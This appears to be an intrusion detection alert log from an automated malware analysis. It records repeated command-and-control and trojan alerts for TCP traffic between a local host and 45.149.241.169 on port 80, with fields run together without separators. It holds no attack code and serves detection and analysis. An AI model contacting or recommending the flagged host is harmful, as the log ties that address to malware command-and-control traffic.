                2024-10-03T09:21:54.984252+020020253811Malware Command and Control Activity Detected192.168.2.104976745.149.241.16980TCP
                2024-10-03T09:21:55.928869+020020253811Malware Command and Control Activity Detected192.168.2.104976845.149.241.16980TCP
                2024-10-03T09:21:57.209847+020020253811Malware Command and Control Activity Detected192.168.2.104976945.149.241.16980TCP
                2024-10-03T09:21:58.212197+020020253811Malware Command and Control Activity Detected192.168.2.104977045.149.241.16980TCP
                2024-10-03T09:21:59.314369+020020253811Malware Command and Control Activity Detected192.168.2.104977145.149.241.16980TCP
                2024-10-03T09:22:00.225165+020020253811Malware Command and Control Activity Detected192.168.2.104977245.149.241.16980TCP
                2024-10-03T09:22:01.533864+020020253811Malware Command and Control Activity Detected192.168.2.104977345.149.241.16980TCP
                2024-10-03T09:22:02.438719+020020253811Malware Command and Control Activity Detected192.168.2.104977445.149.241.16980TCP
                2024-10-03T09:22:03.295902+020020253811Malware Command and Control Activity Detected192.168.2.104977545.149.241.16980TCP
                2024-10-03T09:22:08.197130+020020253811Malware Command and Control Activity Detected192.168.2.104977645.149.241.16980TCP
                2024-10-03T09:22:09.449762+020020253811Malware Command and Control Activity Detected192.168.2.104977745.149.241.16980TCP
                2024-10-03T09:22:10.502964+020020253811Malware Command and Control Activity Detected192.168.2.104977845.149.241.16980TCP
                2024-10-03T09:22:11.390993+020020253811Malware Command and Control Activity Detected192.168.2.104977945.149.241.16980TCP
                2024-10-03T09:22:12.289773+020020253811Malware Command and Control Activity Detected192.168.2.104978045.149.241.16980TCP
                2024-10-03T09:22:13.260240+020020253811Malware Command and Control Activity Detected192.168.2.104978145.149.241.16980TCP
                2024-10-03T09:22:14.183320+020020253811Malware Command and Control Activity Detected192.168.2.104978245.149.241.16980TCP
                2024-10-03T09:22:15.428230+020020253811Malware Command and Control Activity Detected192.168.2.104978345.149.241.16980TCP
                2024-10-03T09:22:16.459230+020020253811Malware Command and Control Activity Detected192.168.2.104978445.149.241.16980TCP
                2024-10-03T09:22:18.541296+020020253811Malware Command and Control Activity Detected192.168.2.104978545.149.241.16980TCP
                2024-10-03T09:22:19.323391+020020253811Malware Command and Control Activity Detected192.168.2.104978645.149.241.16980TCP
                2024-10-03T09:22:20.145363+020020253811Malware Command and Control Activity Detected192.168.2.104978745.149.241.16980TCP
                2024-10-03T09:22:20.992218+020020253811Malware Command and Control Activity Detected192.168.2.104978845.149.241.16980TCP
                2024-10-03T09:22:21.900606+020020253811Malware Command and Control Activity Detected192.168.2.104978945.149.241.16980TCP
                2024-10-03T09:22:22.731444+020020253811Malware Command and Control Activity Detected192.168.2.104979045.149.241.16980TCP
                2024-10-03T09:22:23.590474+020020253811Malware Command and Control Activity Detected192.168.2.104979145.149.241.16980TCP
                2024-10-03T09:22:24.518060+020020253811Malware Command and Control Activity Detected192.168.2.104979245.149.241.16980TCP
                2024-10-03T09:22:25.368288+020020253811Malware Command and Control Activity Detected192.168.2.104979345.149.241.16980TCP
                2024-10-03T09:22:26.207258+020020253811Malware Command and Control Activity Detected192.168.2.104979445.149.241.16980TCP
                2024-10-03T09:22:27.022466+020020253811Malware Command and Control Activity Detected192.168.2.104979545.149.241.16980TCP
                2024-10-03T09:22:28.117331+020020253811Malware Command and Control Activity Detected192.168.2.104979645.149.241.16980TCP
                2024-10-03T09:22:28.927858+020020253811Malware Command and Control Activity Detected192.168.2.104979745.149.241.16980TCP
                2024-10-03T09:22:29.746973+020020253811Malware Command and Control Activity Detected192.168.2.104979845.149.241.16980TCP
                2024-10-03T09:22:30.654397+020020253811Malware Command and Control Activity Detected192.168.2.104979945.149.241.16980TCP
                2024-10-03T09:22:31.633256+020020253811Malware Command and Control Activity Detected192.168.2.104980045.149.241.16980TCP
                2024-10-03T09:22:32.759509+020020253811Malware Command and Control Activity Detected192.168.2.104980145.149.241.16980TCP
                2024-10-03T09:22:33.636826+020020253811Malware Command and Control Activity Detected192.168.2.104980245.149.241.16980TCP
                2024-10-03T09:22:34.567446+020020253811Malware Command and Control Activity Detected192.168.2.104980345.149.241.16980TCP
                2024-10-03T09:22:35.412082+020020253811Malware Command and Control Activity Detected192.168.2.104980445.149.241.16980TCP
                2024-10-03T09:22:36.196016+020020253811Malware Command and Control Activity Detected192.168.2.104980545.149.241.16980TCP
                2024-10-03T09:22:36.999089+020020253811Malware Command and Control Activity Detected192.168.2.104980645.149.241.16980TCP
                2024-10-03T09:22:37.869567+020020253811Malware Command and Control Activity Detected192.168.2.104980745.149.241.16980TCP
                2024-10-03T09:22:40.386731+020020253811Malware Command and Control Activity Detected192.168.2.104980845.149.241.16980TCP
                2024-10-03T09:22:41.280593+020020253811Malware Command and Control Activity Detected192.168.2.104980945.149.241.16980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T09:20:31.352609+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049734TCP
                2024-10-03T09:20:31.352609+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049776TCP
                2024-10-03T09:20:31.352609+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049752TCP
                2024-10-03T09:20:31.352609+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049753TCP
                2024-10-03T09:20:31.352609+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049775TCP
                2024-10-03T09:20:56.433087+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049709TCP
                2024-10-03T09:20:58.057510+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049715TCP
                2024-10-03T09:20:59.146093+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049716TCP
                2024-10-03T09:21:00.189299+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049717TCP
                2024-10-03T09:21:01.618178+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049718TCP
                2024-10-03T09:21:03.531218+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049719TCP
                2024-10-03T09:21:04.415995+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049720TCP
                2024-10-03T09:21:05.371100+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049721TCP
                2024-10-03T09:21:06.270016+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049722TCP
                2024-10-03T09:21:07.162168+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049723TCP
                2024-10-03T09:21:08.100420+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049724TCP
                2024-10-03T09:21:09.016619+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049725TCP
                2024-10-03T09:21:09.866203+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049726TCP
                2024-10-03T09:21:10.873454+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049727TCP
                2024-10-03T09:21:11.922869+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049728TCP
                2024-10-03T09:21:12.883774+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049729TCP
                2024-10-03T09:21:13.809511+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049730TCP
                2024-10-03T09:21:14.648261+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049731TCP
                2024-10-03T09:21:15.453200+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049732TCP
                2024-10-03T09:21:17.431251+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049733TCP
                2024-10-03T09:21:19.697873+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049735TCP
                2024-10-03T09:21:20.723425+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049736TCP
                2024-10-03T09:21:21.531766+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049737TCP
                2024-10-03T09:21:22.455429+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049738TCP
                2024-10-03T09:21:23.396516+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049739TCP
                2024-10-03T09:21:24.279091+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049740TCP
                2024-10-03T09:21:25.106678+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049741TCP
                2024-10-03T09:21:25.966662+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049742TCP
                2024-10-03T09:21:26.743539+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049743TCP
                2024-10-03T09:21:27.718153+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049744TCP
                2024-10-03T09:21:28.565618+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049745TCP
                2024-10-03T09:21:29.496599+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049746TCP
                2024-10-03T09:21:30.428216+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049747TCP
                2024-10-03T09:21:31.426744+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049749TCP
                2024-10-03T09:21:33.376905+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049750TCP
                2024-10-03T09:21:35.071224+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049751TCP
                2024-10-03T09:21:43.033644+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049754TCP
                2024-10-03T09:21:43.862811+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049755TCP
                2024-10-03T09:21:44.836889+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049756TCP
                2024-10-03T09:21:45.682178+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049757TCP
                2024-10-03T09:21:46.489748+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049758TCP
                2024-10-03T09:21:47.385173+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049759TCP
                2024-10-03T09:21:48.319408+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049760TCP
                2024-10-03T09:21:49.262105+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049761TCP
                2024-10-03T09:21:51.019960+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049762TCP
                2024-10-03T09:21:51.937810+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049763TCP
                2024-10-03T09:21:52.840992+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049764TCP
                2024-10-03T09:21:53.882422+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049765TCP
                2024-10-03T09:21:54.819508+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049766TCP
                2024-10-03T09:21:55.764891+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049767TCP
                2024-10-03T09:21:57.079321+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049768TCP
                2024-10-03T09:21:58.045547+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049769TCP
                2024-10-03T09:21:59.158748+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049770TCP
                2024-10-03T09:22:00.077875+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049771TCP
                2024-10-03T09:22:01.217841+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049772TCP
                2024-10-03T09:22:02.282362+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049773TCP
                2024-10-03T09:22:03.145936+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049774TCP
                2024-10-03T09:22:10.325677+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049777TCP
                2024-10-03T09:22:11.233316+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049778TCP
                2024-10-03T09:22:12.139820+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049779TCP
                2024-10-03T09:22:13.088045+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049780TCP
                2024-10-03T09:22:14.035809+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049781TCP
                2024-10-03T09:22:15.264706+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049782TCP
                2024-10-03T09:22:16.298895+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049783TCP
                2024-10-03T09:22:18.387415+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049784TCP
                2024-10-03T09:22:19.168785+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049785TCP
                2024-10-03T09:22:19.989579+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049786TCP
                2024-10-03T09:22:20.842773+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049787TCP
                2024-10-03T09:22:21.750540+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049788TCP
                2024-10-03T09:22:22.569891+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049789TCP
                2024-10-03T09:22:23.432070+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049790TCP
                2024-10-03T09:22:24.378030+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049791TCP
                2024-10-03T09:22:25.212158+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049792TCP
                2024-10-03T09:22:26.056641+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049793TCP
                2024-10-03T09:22:26.875901+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049794TCP
                2024-10-03T09:22:27.950982+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049795TCP
                2024-10-03T09:22:28.773427+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049796TCP
                2024-10-03T09:22:29.585337+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049797TCP
                2024-10-03T09:22:30.499155+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049798TCP
                2024-10-03T09:22:31.474479+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049799TCP
                2024-10-03T09:22:32.296880+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049800TCP
                2024-10-03T09:22:33.482941+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049801TCP
                2024-10-03T09:22:34.404990+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049802TCP
                2024-10-03T09:22:35.271094+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049803TCP
                2024-10-03T09:22:36.052804+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049804TCP
                2024-10-03T09:22:36.845617+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049805TCP
                2024-10-03T09:22:37.721157+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049806TCP
                2024-10-03T09:22:40.212403+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049807TCP
                2024-10-03T09:22:41.031299+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049808TCP
                2024-10-03T09:22:41.953121+020020254831A Network Trojan was detected45.149.241.16980192.168.2.1049809TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T09:20:56.428033+020020243131Malware Command and Control Activity Detected192.168.2.104970945.149.241.16980TCP
                2024-10-03T09:20:57.649849+020020243131Malware Command and Control Activity Detected192.168.2.104971545.149.241.16980TCP
                2024-10-03T09:20:59.140817+020020243131Malware Command and Control Activity Detected192.168.2.104971645.149.241.16980TCP
                2024-10-03T09:21:00.116580+020020243131Malware Command and Control Activity Detected192.168.2.104971745.149.241.16980TCP
                2024-10-03T09:21:01.613318+020020243131Malware Command and Control Activity Detected192.168.2.104971845.149.241.16980TCP
                2024-10-03T09:21:03.526211+020020243131Malware Command and Control Activity Detected192.168.2.104971945.149.241.16980TCP
                2024-10-03T09:21:04.410658+020020243131Malware Command and Control Activity Detected192.168.2.104972045.149.241.16980TCP
                2024-10-03T09:21:05.365447+020020243131Malware Command and Control Activity Detected192.168.2.104972145.149.241.16980TCP
                2024-10-03T09:21:06.262913+020020243131Malware Command and Control Activity Detected192.168.2.104972245.149.241.16980TCP
                2024-10-03T09:21:07.156686+020020243131Malware Command and Control Activity Detected192.168.2.104972345.149.241.16980TCP
                2024-10-03T09:21:08.095625+020020243131Malware Command and Control Activity Detected192.168.2.104972445.149.241.16980TCP
                2024-10-03T09:21:09.011680+020020243131Malware Command and Control Activity Detected192.168.2.104972545.149.241.16980TCP
                2024-10-03T09:21:09.861236+020020243131Malware Command and Control Activity Detected192.168.2.104972645.149.241.16980TCP
                2024-10-03T09:21:10.868266+020020243131Malware Command and Control Activity Detected192.168.2.104972745.149.241.16980TCP
                2024-10-03T09:21:11.918016+020020243131Malware Command and Control Activity Detected192.168.2.104972845.149.241.16980TCP
                2024-10-03T09:21:12.878143+020020243131Malware Command and Control Activity Detected192.168.2.104972945.149.241.16980TCP
                2024-10-03T09:21:13.804474+020020243131Malware Command and Control Activity Detected192.168.2.104973045.149.241.16980TCP
                2024-10-03T09:21:14.643309+020020243131Malware Command and Control Activity Detected192.168.2.104973145.149.241.16980TCP
                2024-10-03T09:21:15.448371+020020243131Malware Command and Control Activity Detected192.168.2.104973245.149.241.16980TCP
                2024-10-03T09:21:17.426363+020020243131Malware Command and Control Activity Detected192.168.2.104973345.149.241.16980TCP
                2024-10-03T09:21:18.676941+020020243131Malware Command and Control Activity Detected192.168.2.104973445.149.241.16980TCP
                2024-10-03T09:21:19.692115+020020243131Malware Command and Control Activity Detected192.168.2.104973545.149.241.16980TCP
                2024-10-03T09:21:20.718523+020020243131Malware Command and Control Activity Detected192.168.2.104973645.149.241.16980TCP
                2024-10-03T09:21:21.526883+020020243131Malware Command and Control Activity Detected192.168.2.104973745.149.241.16980TCP
                2024-10-03T09:21:22.447679+020020243131Malware Command and Control Activity Detected192.168.2.104973845.149.241.16980TCP
                2024-10-03T09:21:23.391639+020020243131Malware Command and Control Activity Detected192.168.2.104973945.149.241.16980TCP
                2024-10-03T09:21:24.274196+020020243131Malware Command and Control Activity Detected192.168.2.104974045.149.241.16980TCP
                2024-10-03T09:21:25.101836+020020243131Malware Command and Control Activity Detected192.168.2.104974145.149.241.16980TCP
                2024-10-03T09:21:25.961812+020020243131Malware Command and Control Activity Detected192.168.2.104974245.149.241.16980TCP
                2024-10-03T09:21:26.738758+020020243131Malware Command and Control Activity Detected192.168.2.104974345.149.241.16980TCP
                2024-10-03T09:21:27.713273+020020243131Malware Command and Control Activity Detected192.168.2.104974445.149.241.16980TCP
                2024-10-03T09:21:28.560491+020020243131Malware Command and Control Activity Detected192.168.2.104974545.149.241.16980TCP
                2024-10-03T09:21:29.491681+020020243131Malware Command and Control Activity Detected192.168.2.104974645.149.241.16980TCP
                2024-10-03T09:21:30.421696+020020243131Malware Command and Control Activity Detected192.168.2.104974745.149.241.16980TCP
                2024-10-03T09:21:31.421949+020020243131Malware Command and Control Activity Detected192.168.2.104974945.149.241.16980TCP
                2024-10-03T09:21:33.372102+020020243131Malware Command and Control Activity Detected192.168.2.104975045.149.241.16980TCP
                2024-10-03T09:21:35.071052+020020243131Malware Command and Control Activity Detected192.168.2.104975145.149.241.16980TCP
                2024-10-03T09:21:36.957061+020020243131Malware Command and Control Activity Detected192.168.2.104975245.149.241.16980TCP
                2024-10-03T09:21:42.165335+020020243131Malware Command and Control Activity Detected192.168.2.104975345.149.241.16980TCP
                2024-10-03T09:21:43.028732+020020243131Malware Command and Control Activity Detected192.168.2.104975445.149.241.16980TCP
                2024-10-03T09:21:43.857914+020020243131Malware Command and Control Activity Detected192.168.2.104975545.149.241.16980TCP
                2024-10-03T09:21:44.832028+020020243131Malware Command and Control Activity Detected192.168.2.104975645.149.241.16980TCP
                2024-10-03T09:21:45.677355+020020243131Malware Command and Control Activity Detected192.168.2.104975745.149.241.16980TCP
                2024-10-03T09:21:46.484782+020020243131Malware Command and Control Activity Detected192.168.2.104975845.149.241.16980TCP
                2024-10-03T09:21:47.380324+020020243131Malware Command and Control Activity Detected192.168.2.104975945.149.241.16980TCP
                2024-10-03T09:21:48.314653+020020243131Malware Command and Control Activity Detected192.168.2.104976045.149.241.16980TCP
                2024-10-03T09:21:49.257250+020020243131Malware Command and Control Activity Detected192.168.2.104976145.149.241.16980TCP
                2024-10-03T09:21:51.015102+020020243131Malware Command and Control Activity Detected192.168.2.104976245.149.241.16980TCP
                2024-10-03T09:21:51.932714+020020243131Malware Command and Control Activity Detected192.168.2.104976345.149.241.16980TCP
                2024-10-03T09:21:52.836195+020020243131Malware Command and Control Activity Detected192.168.2.104976445.149.241.16980TCP
                2024-10-03T09:21:53.876769+020020243131Malware Command and Control Activity Detected192.168.2.104976545.149.241.16980TCP
                2024-10-03T09:21:54.813087+020020243131Malware Command and Control Activity Detected192.168.2.104976645.149.241.16980TCP
                2024-10-03T09:21:55.759857+020020243131Malware Command and Control Activity Detected192.168.2.104976745.149.241.16980TCP
                2024-10-03T09:21:57.049364+020020243131Malware Command and Control Activity Detected192.168.2.104976845.149.241.16980TCP
                2024-10-03T09:21:58.038305+020020243131Malware Command and Control Activity Detected192.168.2.104976945.149.241.16980TCP
                2024-10-03T09:21:59.153854+020020243131Malware Command and Control Activity Detected192.168.2.104977045.149.241.16980TCP
                2024-10-03T09:22:00.071903+020020243131Malware Command and Control Activity Detected192.168.2.104977145.149.241.16980TCP
                2024-10-03T09:22:01.204157+020020243131Malware Command and Control Activity Detected192.168.2.104977245.149.241.16980TCP
                2024-10-03T09:22:02.272358+020020243131Malware Command and Control Activity Detected192.168.2.104977345.149.241.16980TCP
                2024-10-03T09:22:03.139465+020020243131Malware Command and Control Activity Detected192.168.2.104977445.149.241.16980TCP
                2024-10-03T09:22:08.044529+020020243131Malware Command and Control Activity Detected192.168.2.104977545.149.241.16980TCP
                2024-10-03T09:22:09.292301+020020243131Malware Command and Control Activity Detected192.168.2.104977645.149.241.16980TCP
                2024-10-03T09:22:10.319663+020020243131Malware Command and Control Activity Detected192.168.2.104977745.149.241.16980TCP
                2024-10-03T09:22:11.228003+020020243131Malware Command and Control Activity Detected192.168.2.104977845.149.241.16980TCP
                2024-10-03T09:22:12.130536+020020243131Malware Command and Control Activity Detected192.168.2.104977945.149.241.16980TCP
                2024-10-03T09:22:13.083005+020020243131Malware Command and Control Activity Detected192.168.2.104978045.149.241.16980TCP
                2024-10-03T09:22:14.029913+020020243131Malware Command and Control Activity Detected192.168.2.104978145.149.241.16980TCP
                2024-10-03T09:22:15.259916+020020243131Malware Command and Control Activity Detected192.168.2.104978245.149.241.16980TCP
                2024-10-03T09:22:16.293625+020020243131Malware Command and Control Activity Detected192.168.2.104978345.149.241.16980TCP
                2024-10-03T09:22:18.382621+020020243131Malware Command and Control Activity Detected192.168.2.104978445.149.241.16980TCP
                2024-10-03T09:22:19.163958+020020243131Malware Command and Control Activity Detected192.168.2.104978545.149.241.16980TCP
                2024-10-03T09:22:19.984520+020020243131Malware Command and Control Activity Detected192.168.2.104978645.149.241.16980TCP
                2024-10-03T09:22:20.837934+020020243131Malware Command and Control Activity Detected192.168.2.104978745.149.241.16980TCP
                2024-10-03T09:22:21.745606+020020243131Malware Command and Control Activity Detected192.168.2.104978845.149.241.16980TCP
                2024-10-03T09:22:22.564890+020020243131Malware Command and Control Activity Detected192.168.2.104978945.149.241.16980TCP
                2024-10-03T09:22:23.426654+020020243131Malware Command and Control Activity Detected192.168.2.104979045.149.241.16980TCP
                2024-10-03T09:22:24.372920+020020243131Malware Command and Control Activity Detected192.168.2.104979145.149.241.16980TCP
                2024-10-03T09:22:25.207193+020020243131Malware Command and Control Activity Detected192.168.2.104979245.149.241.16980TCP
                2024-10-03T09:22:26.051444+020020243131Malware Command and Control Activity Detected192.168.2.104979345.149.241.16980TCP
                2024-10-03T09:22:26.870939+020020243131Malware Command and Control Activity Detected192.168.2.104979445.149.241.16980TCP
                2024-10-03T09:22:27.946191+020020243131Malware Command and Control Activity Detected192.168.2.104979545.149.241.16980TCP
                2024-10-03T09:22:28.768533+020020243131Malware Command and Control Activity Detected192.168.2.104979645.149.241.16980TCP
                2024-10-03T09:22:29.580351+020020243131Malware Command and Control Activity Detected192.168.2.104979745.149.241.16980TCP
                2024-10-03T09:22:30.494085+020020243131Malware Command and Control Activity Detected192.168.2.104979845.149.241.16980TCP
                2024-10-03T09:22:31.469550+020020243131Malware Command and Control Activity Detected192.168.2.104979945.149.241.16980TCP
                2024-10-03T09:22:32.287998+020020243131Malware Command and Control Activity Detected192.168.2.104980045.149.241.16980TCP
                2024-10-03T09:22:33.477823+020020243131Malware Command and Control Activity Detected192.168.2.104980145.149.241.16980TCP
                2024-10-03T09:22:34.400049+020020243131Malware Command and Control Activity Detected192.168.2.104980245.149.241.16980TCP
                2024-10-03T09:22:35.266278+020020243131Malware Command and Control Activity Detected192.168.2.104980345.149.241.16980TCP
                2024-10-03T09:22:36.047866+020020243131Malware Command and Control Activity Detected192.168.2.104980445.149.241.16980TCP
                2024-10-03T09:22:36.840524+020020243131Malware Command and Control Activity Detected192.168.2.104980545.149.241.16980TCP
                2024-10-03T09:22:37.716251+020020243131Malware Command and Control Activity Detected192.168.2.104980645.149.241.16980TCP
                2024-10-03T09:22:40.207040+020020243131Malware Command and Control Activity Detected192.168.2.104980745.149.241.16980TCP
                2024-10-03T09:22:41.026370+020020243131Malware Command and Control Activity Detected192.168.2.104980845.149.241.16980TCP
                2024-10-03T09:22:41.948130+020020243131Malware Command and Control Activity Detected192.168.2.104980945.149.241.16980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T09:20:56.428033+020020243181Malware Command and Control Activity Detected192.168.2.104970945.149.241.16980TCP
                2024-10-03T09:20:57.649849+020020243181Malware Command and Control Activity Detected192.168.2.104971545.149.241.16980TCP
                2024-10-03T09:20:59.140817+020020243181Malware Command and Control Activity Detected192.168.2.104971645.149.241.16980TCP
                2024-10-03T09:21:00.116580+020020243181Malware Command and Control Activity Detected192.168.2.104971745.149.241.16980TCP
                2024-10-03T09:21:01.613318+020020243181Malware Command and Control Activity Detected192.168.2.104971845.149.241.16980TCP
                2024-10-03T09:21:03.526211+020020243181Malware Command and Control Activity Detected192.168.2.104971945.149.241.16980TCP
                2024-10-03T09:21:04.410658+020020243181Malware Command and Control Activity Detected192.168.2.104972045.149.241.16980TCP
                2024-10-03T09:21:05.365447+020020243181Malware Command and Control Activity Detected192.168.2.104972145.149.241.16980TCP
                2024-10-03T09:21:06.262913+020020243181Malware Command and Control Activity Detected192.168.2.104972245.149.241.16980TCP
                2024-10-03T09:21:07.156686+020020243181Malware Command and Control Activity Detected192.168.2.104972345.149.241.16980TCP
                2024-10-03T09:21:08.095625+020020243181Malware Command and Control Activity Detected192.168.2.104972445.149.241.16980TCP
                2024-10-03T09:21:09.011680+020020243181Malware Command and Control Activity Detected192.168.2.104972545.149.241.16980TCP
                2024-10-03T09:21:09.861236+020020243181Malware Command and Control Activity Detected192.168.2.104972645.149.241.16980TCP
                2024-10-03T09:21:10.868266+020020243181Malware Command and Control Activity Detected192.168.2.104972745.149.241.16980TCP
                2024-10-03T09:21:11.918016+020020243181Malware Command and Control Activity Detected192.168.2.104972845.149.241.16980TCP
                2024-10-03T09:21:12.878143+020020243181Malware Command and Control Activity Detected192.168.2.104972945.149.241.16980TCP
                2024-10-03T09:21:13.804474+020020243181Malware Command and Control Activity Detected192.168.2.104973045.149.241.16980TCP
                2024-10-03T09:21:14.643309+020020243181Malware Command and Control Activity Detected192.168.2.104973145.149.241.16980TCP
                2024-10-03T09:21:15.448371+020020243181Malware Command and Control Activity Detected192.168.2.104973245.149.241.16980TCP
                2024-10-03T09:21:17.426363+020020243181Malware Command and Control Activity Detected192.168.2.104973345.149.241.16980TCP
                2024-10-03T09:21:18.676941+020020243181Malware Command and Control Activity Detected192.168.2.104973445.149.241.16980TCP
                2024-10-03T09:21:19.692115+020020243181Malware Command and Control Activity Detected192.168.2.104973545.149.241.16980TCP
                2024-10-03T09:21:20.718523+020020243181Malware Command and Control Activity Detected192.168.2.104973645.149.241.16980TCP
                2024-10-03T09:21:21.526883+020020243181Malware Command and Control Activity Detected192.168.2.104973745.149.241.16980TCP
                2024-10-03T09:21:22.447679+020020243181Malware Command and Control Activity Detected192.168.2.104973845.149.241.16980TCP
                2024-10-03T09:21:23.391639+020020243181Malware Command and Control Activity Detected192.168.2.104973945.149.241.16980TCP
                2024-10-03T09:21:24.274196+020020243181Malware Command and Control Activity Detected192.168.2.104974045.149.241.16980TCP
                2024-10-03T09:21:25.101836+020020243181Malware Command and Control Activity Detected192.168.2.104974145.149.241.16980TCP
                2024-10-03T09:21:25.961812+020020243181Malware Command and Control Activity Detected192.168.2.104974245.149.241.16980TCP
                2024-10-03T09:21:26.738758+020020243181Malware Command and Control Activity Detected192.168.2.104974345.149.241.16980TCP
                2024-10-03T09:21:27.713273+020020243181Malware Command and Control Activity Detected192.168.2.104974445.149.241.16980TCP
                2024-10-03T09:21:28.560491+020020243181Malware Command and Control Activity Detected192.168.2.104974545.149.241.16980TCP
                2024-10-03T09:21:29.491681+020020243181Malware Command and Control Activity Detected192.168.2.104974645.149.241.16980TCP
                2024-10-03T09:21:30.421696+020020243181Malware Command and Control Activity Detected192.168.2.104974745.149.241.16980TCP
                2024-10-03T09:21:31.421949+020020243181Malware Command and Control Activity Detected192.168.2.104974945.149.241.16980TCP
                2024-10-03T09:21:33.372102+020020243181Malware Command and Control Activity Detected192.168.2.104975045.149.241.16980TCP
                2024-10-03T09:21:35.071052+020020243181Malware Command and Control Activity Detected192.168.2.104975145.149.241.16980TCP
                2024-10-03T09:21:36.957061+020020243181Malware Command and Control Activity Detected192.168.2.104975245.149.241.16980TCP
                2024-10-03T09:21:42.165335+020020243181Malware Command and Control Activity Detected192.168.2.104975345.149.241.16980TCP
                2024-10-03T09:21:43.028732+020020243181Malware Command and Control Activity Detected192.168.2.104975445.149.241.16980TCP
                2024-10-03T09:21:43.857914+020020243181Malware Command and Control Activity Detected192.168.2.104975545.149.241.16980TCP
                2024-10-03T09:21:44.832028+020020243181Malware Command and Control Activity Detected192.168.2.104975645.149.241.16980TCP
